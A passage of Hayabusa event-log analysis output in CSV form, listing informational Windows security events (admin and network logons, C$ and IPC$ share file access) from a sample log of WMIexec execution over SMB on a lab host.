10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 